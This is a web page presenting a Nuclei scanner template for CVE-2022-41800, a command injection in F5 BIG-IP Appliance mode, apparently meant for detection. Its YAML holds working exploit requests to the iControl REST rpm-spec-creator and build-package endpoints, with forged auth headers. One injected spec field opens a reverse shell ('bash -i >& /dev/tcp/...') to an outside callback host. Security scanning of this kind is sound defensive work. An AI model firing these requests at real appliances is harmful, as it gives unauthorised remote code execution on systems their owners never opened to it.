F5 BIG-IP Appliance Mode - Command Injection
ID: CVE-2022-41800
Severity: high
Author: dwisiswant0
Tags: cve,cve2022,rce,f5,bigip,instrusive
Description
Section titled “Description”When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
YAML Source
Section titled “YAML Source”id: CVE-2022-41800
info: name: F5 BIG-IP Appliance Mode - Command Injection author: dwisiswant0 severity: high description: | When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. impact: | A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388). reference: - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis - https://support.f5.com/csp/article/K97843387 - https://support.f5.com/csp/article/K13325942 - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ - https://nvd.nist.gov/vuln/detail/cve-2022-41800 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N cvss-score: 8.7 cve-id: CVE-2022-41800 cwe-id: CWE-77 epss-score: 0.0109 epss-percentile: 0.84818 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: f5 product: big-ip_access_policy_manager shodan-query: - http.title:"big-ip®-+redirect" +"server" - http.html:"big-ip apm" fofa-query: - body="big-ip apm" - title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" tags: cve,cve2022,rce,f5,bigip,instrusive
variables: auth: "admin:{{rand_text_alpha(1)}}" rand_app: "{{to_lower(rand_text_alpha(6))}}" rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}" rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
http: - raw: - | POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1 Host: {{Hostname}} X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} Authorization: Basic {{base64(auth)}} Content-Type: application/json Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{ "specFileData": { "name": "{{rand_app}}", "srcBasePath": "/tmp", "version": "{{rand_ver}}", "release": "{{rand_rel}}", "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1", "summary": "{{to_lower(rand_text_alphanumeric(10))}}" } }
- | POST /mgmt/shared/iapp/build-package HTTP/1.1 Host: {{Hostname}} X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}} Authorization: Basic {{base64(auth)}} Content-Type: application/json Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
{ "state": {}, "appName": "{{rand_app}}", "packageDirectory": "/tmp", "specFilePath": "{{spec}}", "force": true }
extractors: - type: json part: body name: spec json: - ".specFilePath" internal: true
matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns"
- type: word part: body words: - "RUN_BUILD_RPM_TASK" - "shared:iapp:build-package:buildrpmtaskstate"# digest: 4a0a00473045022100a57e06512c7cc80aef74d56ff148ef58a0f939b086187a95fd62f41c7262294002203fef201e4c490cae24a33d78bc67b26465f0588c882a57e4af211ca22aafd40c:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-41800.yaml"